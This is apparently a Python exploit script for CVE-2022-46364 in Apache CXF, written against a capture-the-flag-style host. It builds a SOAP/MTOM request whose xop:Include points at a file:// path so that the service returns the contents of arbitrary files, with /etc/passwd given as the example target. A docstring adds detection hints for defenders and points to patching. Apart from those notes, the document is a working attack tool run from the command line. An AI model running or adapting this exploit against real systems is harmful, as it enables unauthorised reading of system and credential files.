import requests
import argparse
import base64
import sys

# SOAP endpoint that exploit() posts to. It is plain HTTP on port 8080, and the
# double slash before "employeeservice" is kept exactly as the author wrote it.
vuln_url = "http://devarea.htb:8080//employeeservice"

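def exploit(file_path):
    """Request ``file_path`` through the service's XOP include handling.

    Sends one SOAP/MTOM POST to ``vuln_url``. The ``<content>`` element of
    the ``submitReport`` call holds an ``xop:Include`` whose ``href`` is
    ``file://{file_path}`` instead of a reference to another MIME part of
    the same message. The function expects the service to echo the resolved
    bytes base64-encoded between ``"Content: "`` and ``"</return>"``, decodes
    them and writes them raw to stdout.

    Defender notes: this is the request shape to look for in web-service
    logs or at a proxy. The Content-Type is ``multipart/related;
    type="application/xop+xml"`` and the ``xop:Include`` href does not use
    the ``cid:`` scheme that legitimate MTOM attachments use. The fix is to
    run an Apache CXF release that the vendor advisory for CVE-2022-46364
    lists as patched.

    Args:
        file_path: Absolute path placed after ``file://`` in the href. It is
            interpolated into the XML as-is, without escaping.

    Returns:
        None. Output goes to stdout: the decoded bytes, or a message when
        the response carries no payload.
    """
    # The boundary must match the one used in the Content-Type header
    boundary = "boundary"

    headers = {
        "Content-Type": f'multipart/related; type="application/xop+xml"; start="<rootpart>"; boundary="{boundary}"',
        "SOAPAction": '""',
    }

    body = (
        f"--{boundary}\r\n"
        "Content-Type: application/xop+xml; charset=UTF-8\r\n"
        "Content-Transfer-Encoding: 8bit\r\n"
        "Content-ID: <rootpart>\r\n"
        "\r\n"
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dev="http://devarea.htb/">\r\n'
        "   <soapenv:Body>\r\n"
        "      <dev:submitReport>\r\n"
        "         <arg0>\r\n"
        f'            <content><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file://{file_path}"/></content>\r\n'
        "         </arg0>\r\n"
        "      </dev:submitReport>\r\n"
        "   </soapenv:Body>\r\n"
        "</soapenv:Envelope>\r\n"
        f"--{boundary}--\r\n"
    )

    response = requests.post(vuln_url, headers=headers, data=body, timeout=10)

    # A SOAP fault or a patched service returns no "Content: " marker. The
    # original indexed [1] unconditionally, so that case raised IndexError
    # and never reached the message below.
    pieces = response.text.split("Content: ")
    base64_data = pieces[1].split('</return>')[0] if len(pieces) > 1 else ""
    if not base64_data:
        print("No data found in the response. Maybe the file doesn't exists or is empty or isn't readable.")
        return
    file_content = base64.b64decode(base64_data)
    # Write bytes, not text, so binary content is not mangled by re-encoding.
    sys.stdout.buffer.write(file_content)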

if __name__ == "__main__":
    # One positional argument: the path handed to exploit().
    cli = argparse.ArgumentParser(
        description="Exploit CVE-2022-46364 - Apache CXF SSRF"
    )
    cli.add_argument(
        "file_path",
        help="The file path to read on the target system (e.g., /etc/passwd)",
    )
    exploit(cli.parse_args().file_path)
    
